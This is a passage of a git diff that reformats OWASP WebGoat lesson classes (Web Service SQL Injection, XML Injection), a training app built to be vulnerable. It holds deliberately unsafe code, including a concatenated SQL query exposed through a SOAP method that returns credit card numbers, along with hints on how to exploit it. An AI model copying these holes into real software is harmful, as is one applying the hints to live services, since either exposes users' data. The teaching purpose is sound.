-			+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;ns1:getCreditCard SOAP-ENV:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:ns1='http://lessons'&gt; <br>"
-			+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;id xsi:type='xsd:string'&gt;101&lt;/id&gt; <br>"
-			+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/ns1:getCreditCard&gt; <br>"
-			+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;/SOAP-ENV:Body&gt; <br>"
-			+ "&nbsp;&nbsp;&lt;/SOAP-ENV:Envelope&gt; <br>" + "");
-	/*		"&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt; <br>" +
-	 "  &lt;SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" <br>" +
-	 "	                  xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" <br>" +
-	 "	                  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"&gt; <br>" +
-	 "     &lt;SOAP-ENV:Body&gt; <br>" +
-	 "		  &lt;ns1:getCreditCard SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\"&gt; <br>" +
-	 "		   &lt;id xsi:type=\"xsd:string\"&gt;101&lt;/id&gt; <br>"+
-	 "		  &lt;/ns1:getCreditCard&gt; <br>" +
-	 "     &lt;/SOAP-ENV:Body&gt; <br>" +
-	 "  &lt;/SOAP-ENV:Envelope&gt; <br><br>" +
-	 "Intercept the HTTP request and try to create a soap request.");	*/
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(150);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    public String getTitle()
-    {
-	return "Web Service SQL Injection";
-    }
-
-
-    protected Element makeAccountLine(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	ec.addElement(new P().addElement("Enter your Account Number: "));
-
-	accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
-	Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
-	ec.addElement(input);
-
-	Element b = ECSFactory.makeButton("Go!");
-	ec.addElement(b);
-
-	return ec;
-    }
-
-
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	try
+	protected Category getDefaultCategory()
 	{
-	    ec.addElement(makeAccountLine(s));
-
-	    String query = "SELECT * FROM user_data WHERE userid = "
-		    + accountNumber;
-	    ec.addElement(new PRE(query));
-	    for (int i = 0; i < accountNumber.length(); i++)
-	    {
-		char c = accountNumber.charAt(i);
-		if (c < '0' || c > '9')
-		{
-		    ec.addElement("Invalid account number. ");
-		    accountNumber = "0";
-		}
-	    }
-	    try
-	    {
-		ResultSet results = getResults(accountNumber);
-		if ((results != null) && (results.first() == true))
-		{
-		    ResultSetMetaData resultsMetaData = results.getMetaData();
-		    ec.addElement(DatabaseUtilities.writeTable(results,
-			    resultsMetaData));
-		    results.last();
-		    if (results.getRow() >= 6)
-		    {
-			//this should never happen
-		    }
-		}
-		else
-		{
-		    ec.addElement("No results matched.  Try Again.");
-		}
-	    }
-	    catch (SQLException sqle)
-	    {
-		ec.addElement(new P().addElement(sqle.getMessage()));
-	    }
-	    A a = new A("services/WsSqlInjection?WSDL", "WebGoat WSDL File");
-	    ec
-		    .addElement(new P()
-			    .addElement("Exploit the following WSDL to access sensitive data:"));
-	    ec.addElement(new BR());
-	    ec.addElement(a);
-	    getLessonTracker(s).setCompleted(completed);
+		return Category.WEB_SERVICES;
 	}
-	catch (Exception e)
+
+	protected List<String> getHints(WebSession s)
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		List<String> hints = new ArrayList<String>();
+		hints.add("Try connecting to the WSDL with a browser or Web Service tool.");
+		hints.add("Sometimes the server side code will perform input validation before issuing  "
+				+ "the request to the web service operation.  Try to bypass this check by "
+				+ "accessing the web service directly");
+		hints.add("The URL for the web service is: http://localhost/WebGoat/services/WsSqlInjection?WSDL <br>"
+				+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
+		hints.add("Create a new soap request for the getCreditCard(String id) operation.");
+		hints
+				.add("A soap request uses the following HTTP header: <br> "
+						+ "SOAPAction: some action header, can be &quot;&quot;<br><br>"
+						+ "The soap message body has the following format:<br>"
+						+ "&lt;?xml version='1.0' encoding='UTF-8'?&gt; <br>"
+						+ "&nbsp;&nbsp;&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'&gt; <br>"
+						+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;SOAP-ENV:Body&gt; <br>"
+						+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;ns1:getCreditCard SOAP-ENV:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:ns1='http://lessons'&gt; <br>"
+						+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;id xsi:type='xsd:string'&gt;101&lt;/id&gt; <br>"
+						+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/ns1:getCreditCard&gt; <br>"
+						+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;/SOAP-ENV:Body&gt; <br>"
+						+ "&nbsp;&nbsp;&lt;/SOAP-ENV:Envelope&gt; <br>" + "");
+		/*
+		 * "&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt; <br>" + " &lt;SOAP-ENV:Envelope
+		 * xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" <br>" + "
+		 * xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" <br>" + "
+		 * xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"&gt; <br>" + "
+		 * &lt;SOAP-ENV:Body&gt; <br>" + " &lt;ns1:getCreditCard
+		 * SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"
+		 * xmlns:ns1=\"http://lessons\"&gt; <br>" + " &lt;id
+		 * xsi:type=\"xsd:string\"&gt;101&lt;/id&gt; <br>"+ " &lt;/ns1:getCreditCard&gt; <br>" + "
+		 * &lt;/SOAP-ENV:Body&gt; <br>" + " &lt;/SOAP-ENV:Envelope&gt; <br><br>" + "Intercept the
+		 * HTTP request and try to create a soap request.");
+		 */
+		return hints;
 	}
-	return (ec);
-    }
 
+	private final static Integer DEFAULT_RANKING = new Integer(150);
 
-    public ResultSet getResults(String id)
-    {
-	try
+	protected Integer getDefaultRanking()
 	{
-	    Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
-	    String query = "SELECT * FROM user_data WHERE userid = " + id;
-	    try
-	    {
-		Statement statement = connection.createStatement(
-			ResultSet.TYPE_SCROLL_INSENSITIVE,
-			ResultSet.CONCUR_READ_ONLY);
-		ResultSet results = statement.executeQuery(query);
-		return results;
-	    }
-	    catch (SQLException sqle)
-	    {}
+		return DEFAULT_RANKING;
 	}
-	catch (Exception e)
-	{}
-	return null;
-    }
 
-
-    public String[] getCreditCard(String id)
-    {
-	ResultSet results = getResults(id);
-	if ((results != null))
+	public String getTitle()
 	{
-	    try
-	    {
-		results.last();
-		String[] users = new String[results.getRow()];
-		if (users.length > 4)
-		{
-		    completed = true;
-		}
-		results.beforeFirst();
-		while (results.next() == true)
-		{
-		    int i = results.getRow();
-		    users[i - 1] = results.getString(ccNumber);
-		}
-		return users;
-	    }
-	    catch (SQLException sqle)
-	    {}
+		return "Web Service SQL Injection";
 	}
-	return null;
-    }
 
+	protected Element makeAccountLine(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
 
-    public Element getCredits()
-    {
-	return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO);
-    }
+		ec.addElement(new P().addElement("Enter your Account Number: "));
+
+		accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
+		Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
+		ec.addElement(input);
+
+		Element b = ECSFactory.makeButton("Go!");
+		ec.addElement(b);
+
+		return ec;
+	}
+
+	protected Element createContent(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		try
+		{
+			ec.addElement(makeAccountLine(s));
+
+			String query = "SELECT * FROM user_data WHERE userid = " + accountNumber;
+			ec.addElement(new PRE(query));
+			for (int i = 0; i < accountNumber.length(); i++)
+			{
+				char c = accountNumber.charAt(i);
+				if (c < '0' || c > '9')
+				{
+					ec.addElement("Invalid account number. ");
+					accountNumber = "0";
+				}
+			}
+			try
+			{
+				ResultSet results = getResults(accountNumber);
+				if ((results != null) && (results.first() == true))
+				{
+					ResultSetMetaData resultsMetaData = results.getMetaData();
+					ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+					results.last();
+					if (results.getRow() >= 6)
+					{
+						// this should never happen
+					}
+				}
+				else
+				{
+					ec.addElement("No results matched.  Try Again.");
+				}
+			} catch (SQLException sqle)
+			{
+				ec.addElement(new P().addElement(sqle.getMessage()));
+			}
+			A a = new A("services/WsSqlInjection?WSDL", "WebGoat WSDL File");
+			ec.addElement(new P().addElement("Exploit the following WSDL to access sensitive data:"));
+			ec.addElement(new BR());
+			ec.addElement(a);
+			getLessonTracker(s).setCompleted(completed);
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
+	}
+
+	public ResultSet getResults(String id)
+	{
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
+			String query = "SELECT * FROM user_data WHERE userid = " + id;
+			try
+			{
+				Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																	ResultSet.CONCUR_READ_ONLY);
+				ResultSet results = statement.executeQuery(query);
+				return results;
+			} catch (SQLException sqle)
+			{
+			}
+		} catch (Exception e)
+		{
+		}
+		return null;
+	}
+
+	public String[] getCreditCard(String id)
+	{
+		ResultSet results = getResults(id);
+		if ((results != null))
+		{
+			try
+			{
+				results.last();
+				String[] users = new String[results.getRow()];
+				if (users.length > 4)
+				{
+					completed = true;
+				}
+				results.beforeFirst();
+				while (results.next() == true)
+				{
+					int i = results.getRow();
+					users[i - 1] = results.getString(ccNumber);
+				}
+				return users;
+			} catch (SQLException sqle)
+			{
+			}
+		}
+		return null;
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java
index 726365dc1..9dd5db8ca 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.PrintWriter;
 import java.util.ArrayList;
 import java.util.HashMap;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -20,368 +20,310 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
  */
 public class XMLInjection extends LessonAdapter
 {
 
-    private final static Integer DEFAULT_RANKING = new Integer(20);
+	private final static Integer DEFAULT_RANKING = new Integer(20);
 
-    private final static String ACCOUNTID = "accountID";
+	private final static String ACCOUNTID = "accountID";
 
-    public static HashMap<Integer, Reward> rewardsMap = new HashMap<Integer, Reward>();
+	public static HashMap<Integer, Reward> rewardsMap = new HashMap<Integer, Reward>();
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    protected static HashMap<Integer, Reward> init()
-    {
-	Reward r = new Reward();
-
-	r.setName("WebGoat t-shirt");
-	r.setPoints(50);
-	rewardsMap.put(1001, r);
-
-	r = new Reward();
-	r.setName("WebGoat Secure Kettle");
-	r.setPoints(30);
-	rewardsMap.put(1002, r);
-
-	r = new Reward();
-	r.setName("WebGoat Mug");
-	r.setPoints(20);
-	rewardsMap.put(1003, r);
-
-	r = new Reward();
-	r.setName("WebGoat Core Duo Laptop");
-	r.setPoints(2000);
-	rewardsMap.put(1004, r);
-
-	r = new Reward();
-	r.setName("WebGoat Hawaii Cruise");
-	r.setPoints(3000);
-	rewardsMap.put(1005, r);
-
-	return rewardsMap;
-    }
-
-
-    public void handleRequest(WebSession s)
-    {
-
-	try
+	protected static HashMap<Integer, Reward> init()
 	{
-	    if (s.getParser().getRawParameter("from", "").equals("ajax"))
-	    {
-		if (s.getParser().getRawParameter(ACCOUNTID, "").equals(
-			"836239"))
+		Reward r = new Reward();
+
+		r.setName("WebGoat t-shirt");
+		r.setPoints(50);
+		rewardsMap.put(1001, r);
+
+		r = new Reward();
+		r.setName("WebGoat Secure Kettle");
+		r.setPoints(30);
+		rewardsMap.put(1002, r);
+
+		r = new Reward();
+		r.setName("WebGoat Mug");
+		r.setPoints(20);
+		rewardsMap.put(1003, r);
+
+		r = new Reward();
+		r.setName("WebGoat Core Duo Laptop");
+		r.setPoints(2000);
+		rewardsMap.put(1004, r);
+
+		r = new Reward();
+		r.setName("WebGoat Hawaii Cruise");
+		r.setPoints(3000);
+		rewardsMap.put(1005, r);
+
+		return rewardsMap;
+	}
+
+	public void handleRequest(WebSession s)
+	{
+
+		try
 		{
-		    String lineSep = System.getProperty("line.separator");
-		    String xmlStr = "<root>" + lineSep
-			    + "<reward>WebGoat Mug 20 Pts</reward>"
-			    + lineSep
-			    + "<reward>WebGoat t-shirt 50 Pts</reward>"
-			    + lineSep + "<reward>WebGoat Secure Kettle 30 Pts</reward>"
-			    + lineSep + "</root>";
-		    s.getResponse().setContentType("text/xml");
-		    s.getResponse().setHeader("Cache-Control", "no-cache");
-		    PrintWriter out = new PrintWriter(s.getResponse()
-			    .getOutputStream());
-		    out.print(xmlStr);
-		    out.flush();
-		    out.close();
-		    return;
+			if (s.getParser().getRawParameter("from", "").equals("ajax"))
+			{
+				if (s.getParser().getRawParameter(ACCOUNTID, "").equals("836239"))
+				{
+					String lineSep = System.getProperty("line.separator");
+					String xmlStr = "<root>" + lineSep + "<reward>WebGoat Mug 20 Pts</reward>" + lineSep
+							+ "<reward>WebGoat t-shirt 50 Pts</reward>" + lineSep
+							+ "<reward>WebGoat Secure Kettle 30 Pts</reward>" + lineSep + "</root>";
+					s.getResponse().setContentType("text/xml");
+					s.getResponse().setHeader("Cache-Control", "no-cache");
+					PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
+					out.print(xmlStr);
+					out.flush();
+					out.close();
+					return;
+				}
+			}
+		} catch (Exception ex)
+		{
+			ex.printStackTrace();
 		}
-	    }
-	}
-	catch (Exception ex)
-	{
-	    ex.printStackTrace();
+
+		Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
+
+		form.addElement(createContent(s));
+
+		setContent(form);
+
 	}
 
-	Form form = new Form(getFormAction(), Form.POST).setName("form")
-		.setEncType("");
-
-	form.addElement(createContent(s));
-
-	setContent(form);
-
-    }
-
-
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-	boolean isDone = false;
-	init();
-
-	if (s.getParser().getRawParameter("done", "").equals("yes"))
+	protected Element createContent(WebSession s)
 	{
-	    isDone = true;
-	}
-	String lineSep = System.getProperty("line.separator");
-	String script = "<script>"
-		+ lineSep
-		+ "function getRewards() {"
-		+ lineSep
-		+ "var accountIDField = document.getElementById('"
-		+ ACCOUNTID
-		+ "');"
-		+ lineSep
-		+ "if (accountIDField.value.length < 6 ) { return; }"
-		+ lineSep
-		+ "var url = '" + getLink()
-		+ "&from=ajax&"
-		+ ACCOUNTID
-		+ "=' + encodeURIComponent(accountIDField.value);"
-		+ lineSep
-		+ "if (typeof XMLHttpRequest != 'undefined') {"
-		+ lineSep
-		+ "req = new XMLHttpRequest();"
-		+ lineSep
-		+ "} else if (window.ActiveXObject) {"
-		+ lineSep
-		+ "req = new ActiveXObject('Microsoft.XMLHTTP');"
-		+ lineSep
-		+ "   }"
-		+ lineSep
-		+ "   req.open('GET', url, true);"
-		+ lineSep
-		+ "   req.onreadystatechange = callback;"
-		+ lineSep
-		+ "   req.send(null);"
-		+ lineSep
-		+ "}"
-		+ lineSep
-		+ "function callback() {"
-		+ lineSep
-		+ "    if (req.readyState == 4) { "
-		+ lineSep
-		+ "        if (req.status == 200) { "
-		+ lineSep
-		+ "            var rewards = req.responseXML.getElementsByTagName('reward');"
-		+ lineSep
-		+ "			 var rewardsDiv = document.getElementById('rewardsDiv');"
-		+ lineSep
-		+ "				rewardsDiv.innerHTML = '';"
-		+ lineSep
-		+ "				var strHTML='';"
-		+ lineSep
-		+ "				strHTML = '<tr><td>&nbsp;</td><td><b>Rewards</b></td></tr>';"
-		+ lineSep
-		+ "			 for(var i=0; i< rewards.length; i++){"
-		//+ lineSep
-		//+ "				var node = rewards.childNodes[i+1];"
-		+ lineSep
-		+ "				strHTML = strHTML + '<tr><td><input name=\"check' + (i+1001) +'\" type=\"checkbox\"></td><td>';"
-		+ lineSep
-		+ "			    strHTML = strHTML + rewards[i].firstChild.nodeValue + '</td></tr>';"
-		+ lineSep
-		+ "			 }"
-		+ lineSep
-		+ "				strHTML = '<table>' + strHTML + '</table>';"
-		+ lineSep
-		+ "				strHTML = 'Your account balance is now 100 points<br><br>' + strHTML;"
-		+ lineSep + "               rewardsDiv.innerHTML = strHTML;"
-		+ lineSep + "        }}}" + lineSep + "</script>" + lineSep;
+		ElementContainer ec = new ElementContainer();
+		boolean isDone = false;
+		init();
 
-	if (!isDone)
-	{
-	    ec.addElement(new StringElement(script));
-	}
-	ec.addElement(new BR().addElement(new H1()
-		.addElement("Welcome to WebGoat-Miles Reward Miles Program.")));
-	ec.addElement(new BR());
+		if (s.getParser().getRawParameter("done", "").equals("yes"))
+		{
+			isDone = true;
+		}
+		String lineSep = System.getProperty("line.separator");
+		String script = "<script>" + lineSep + "function getRewards() {" + lineSep
+				+ "var accountIDField = document.getElementById('" + ACCOUNTID + "');" + lineSep
+				+ "if (accountIDField.value.length < 6 ) { return; }" + lineSep + "var url = '" + getLink()
+				+ "&from=ajax&" + ACCOUNTID + "=' + encodeURIComponent(accountIDField.value);" + lineSep
+				+ "if (typeof XMLHttpRequest != 'undefined') {" + lineSep + "req = new XMLHttpRequest();" + lineSep
+				+ "} else if (window.ActiveXObject) {" + lineSep + "req = new ActiveXObject('Microsoft.XMLHTTP');"
+				+ lineSep + "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
+				+ "   req.onreadystatechange = callback;" + lineSep + "   req.send(null);" + lineSep + "}"
+				+ lineSep
+				+ "function callback() {"
+				+ lineSep
+				+ "    if (req.readyState == 4) { "
+				+ lineSep
+				+ "        if (req.status == 200) { "
+				+ lineSep
+				+ "            var rewards = req.responseXML.getElementsByTagName('reward');"
+				+ lineSep
+				+ "			 var rewardsDiv = document.getElementById('rewardsDiv');"
+				+ lineSep
+				+ "				rewardsDiv.innerHTML = '';"
+				+ lineSep
+				+ "				var strHTML='';"
+				+ lineSep
+				+ "				strHTML = '<tr><td>&nbsp;</td><td><b>Rewards</b></td></tr>';"
+				+ lineSep
+				+ "			 for(var i=0; i< rewards.length; i++){"
+				// + lineSep
+				// + " var node = rewards.childNodes[i+1];"
+				+ lineSep
+				+ "				strHTML = strHTML + '<tr><td><input name=\"check' + (i+1001) +'\" type=\"checkbox\"></td><td>';"
+				+ lineSep + "			    strHTML = strHTML + rewards[i].firstChild.nodeValue + '</td></tr>';" + lineSep
+				+ "			 }" + lineSep + "				strHTML = '<table>' + strHTML + '</table>';" + lineSep
+				+ "				strHTML = 'Your account balance is now 100 points<br><br>' + strHTML;" + lineSep
+				+ "               rewardsDiv.innerHTML = strHTML;" + lineSep + "        }}}" + lineSep + "</script>"
+				+ lineSep;
 
-	ec.addElement(new BR().addElement(new H3()
-		.addElement("Rewards available through the program:")));
-	ec.addElement(new BR());
-	Table t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
-		.setWidth("90%").setAlign("center");
-	TR trRewards = null;
+		if (!isDone)
+		{
+			ec.addElement(new StringElement(script));
+		}
+		ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat-Miles Reward Miles Program.")));
+		ec.addElement(new BR());
 
-	for (int i = 1001; i < 1001 + rewardsMap.size(); i++)
-	{
-	    trRewards = new TR();
-	    Reward r = (Reward) rewardsMap.get(i);
-	    trRewards.addElement(new TD("-" + r.getName()));
-	    trRewards.addElement(new TD(r.getPoints() + " Pts"));
-	    t2.addElement(trRewards);
-	}
+		ec.addElement(new BR().addElement(new H3().addElement("Rewards available through the program:")));
+		ec.addElement(new BR());
+		Table t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
+		TR trRewards = null;
 
-	ec.addElement(t2);
-
-	ec.addElement(new BR());
-
-	ec.addElement(new H3().addElement("Redeem your points:"));
-	ec.addElement(new BR());
-
-	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
-		.setWidth("90%").setAlign("center");
-
-	TR tr = new TR();
-
-	tr.addElement(new TD("Please enter your account ID:"));
-
-	Input input1 = new Input(Input.TEXT, ACCOUNTID, "");
-	input1.addAttribute("onkeyup", "getRewards();");
-	input1.addAttribute("id", ACCOUNTID);
-	tr.addElement(new TD(input1));
-	t1.addElement(tr);
-
-	ec.addElement(t1);
-	ec.addElement(new BR());
-	ec.addElement(new BR());
-	ec.addElement(new BR());
-
-	Div div = new Div();
-	div.addAttribute("name", "rewardsDiv");
-	div.addAttribute("id", "rewardsDiv");
-	ec.addElement(div);
-
-	Input b = new Input();
-	b.setType(Input.SUBMIT);
-	b.setValue("Submit");
-	b.setName("SUBMIT");
-	ec.addElement(b);
-
-	if (s.getParser().getRawParameter("SUBMIT", "") != "")
-	{
-	    if (s.getParser().getRawParameter("check1004", "") != "")
-	    {
-		makeSuccess(s);
-	    }
-	    else
-	    {
-		StringBuffer shipment = new StringBuffer();
 		for (int i = 1001; i < 1001 + rewardsMap.size(); i++)
 		{
-
-		    if (s.getParser().getRawParameter("check" + i, "") != "")
-		    {
-			shipment.append(((Reward) rewardsMap.get(i)).getName()
-				+ "<br>");
-		    }
+			trRewards = new TR();
+			Reward r = (Reward) rewardsMap.get(i);
+			trRewards.addElement(new TD("-" + r.getName()));
+			trRewards.addElement(new TD(r.getPoints() + " Pts"));
+			t2.addElement(trRewards);
 		}
-		shipment
-			.insert(0,
-				"<br><br><b>The following items will be shipped to your address:</b><br>");
-		ec.addElement(new StringElement(shipment.toString()));
-	    }
 
+		ec.addElement(t2);
+
+		ec.addElement(new BR());
+
+		ec.addElement(new H3().addElement("Redeem your points:"));
+		ec.addElement(new BR());
+
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
+
+		TR tr = new TR();
+
+		tr.addElement(new TD("Please enter your account ID:"));
+
+		Input input1 = new Input(Input.TEXT, ACCOUNTID, "");
+		input1.addAttribute("onkeyup", "getRewards();");
+		input1.addAttribute("id", ACCOUNTID);
+		tr.addElement(new TD(input1));
+		t1.addElement(tr);
+
+		ec.addElement(t1);
+		ec.addElement(new BR());
+		ec.addElement(new BR());
+		ec.addElement(new BR());
+
+		Div div = new Div();
+		div.addAttribute("name", "rewardsDiv");
+		div.addAttribute("id", "rewardsDiv");
+		ec.addElement(div);
+
+		Input b = new Input();
+		b.setType(Input.SUBMIT);
+		b.setValue("Submit");
+		b.setName("SUBMIT");
+		ec.addElement(b);
+
+		if (s.getParser().getRawParameter("SUBMIT", "") != "")
+		{
+			if (s.getParser().getRawParameter("check1004", "") != "")
+			{
+				makeSuccess(s);
+			}
+			else
+			{
+				StringBuffer shipment = new StringBuffer();
+				for (int i = 1001; i < 1001 + rewardsMap.size(); i++)
+				{
+
+					if (s.getParser().getRawParameter("check" + i, "") != "")
+					{
+						shipment.append(((Reward) rewardsMap.get(i)).getName() + "<br>");
+					}
+				}
+				shipment.insert(0, "<br><br><b>The following items will be shipped to your address:</b><br>");
+				ec.addElement(new StringElement(shipment.toString()));
+			}
+
+		}
+
+		return ec;
 	}
 
-	return ec;
-    }
-
-
-    protected Element makeSuccess(WebSession s)
-    {
-	getLessonTracker(s).setCompleted(true);
-
-	s
-		.setMessage("Congratulations. You have successfully completed this lesson.");
-
-	return (null);
-    }
-
-
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
-
-
-    protected Category getDefaultCategory()
-    {
-
-	return Category.AJAX_SECURITY;
-    }
-
-
-    protected Integer getDefaultRanking()
-    {
-
-	return DEFAULT_RANKING;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-
-	List<String> hints = new ArrayList<String>();
-	hints.add("This page is using XMLHTTP to comunicate with the server.");
-	hints.add("Try to intercept the reply and check the reply.");
-	hints
-		.add("Intercept the reply and try to inject some XML to add more rewards to yourself.");
-	return hints;
-    }
-
-
-    public String getTitle()
-    {
-	return "XML Injection";
-    }
-
-    static class Reward
-    {
-
-	private String name;
-
-	private int points;
-
-
-	public String getName()
+	protected Element makeSuccess(WebSession s)
 	{
-	    return name;
+		getLessonTracker(s).setCompleted(true);
+
+		s.setMessage("Congratulations. You have successfully completed this lesson.");
+
+		return (null);
 	}
 
-
-	public void setName(String name)
+	public Element getCredits()
 	{
-	    this.name = name;
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
 	}
 
-
-	public int getPoints()
+	protected Category getDefaultCategory()
 	{
-	    return points;
+
+		return Category.AJAX_SECURITY;
 	}
 
-
-	public void setPoints(int points)
+	protected Integer getDefaultRanking()
 	{
-	    this.points = points;
+
+		return DEFAULT_RANKING;
 	}
 
-    }
+	protected List<String> getHints(WebSession s)
+	{
+
+		List<String> hints = new ArrayList<String>();
+		hints.add("This page is using XMLHTTP to comunicate with the server.");
+		hints.add("Try to intercept the reply and check the reply.");
+		hints.add("Intercept the reply and try to inject some XML to add more rewards to yourself.");
+		return hints;
+	}
+
+	public String getTitle()
+	{
+		return "XML Injection";
+	}
+
+	static class Reward
+	{
+
+		private String name;
+
+		private int points;
+
+		public String getName()
+		{
+			return name;
+		}
+
+		public void setName(String name)
+		{
+			this.name = name;
+		}
+
+		public int getPoints()
+		{
+			return points;
+		}
+
+		public void setPoints(int points)
+		{
+			this.points = points;
+		}
+
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java
index ba98ab3d3..6307b8783 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java
@@ -1,6 +1,7 @@
 /**
  * 
  */
+
 package org.owasp.webgoat.lessons;
 
 import java.io.File;
@@ -11,12 +12,10 @@ import java.io.FileInputStream;
 import org.xml.sax.InputSource;
 import org.w3c.dom.NodeList;
 import org.w3c.dom.Node;
-
 import javax.xml.xpath.XPathConstants;
 import javax.xml.xpath.XPath;
 import javax.xml.xpath.XPathFactory;
 import javax.xml.xpath.XPathExpressionException;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
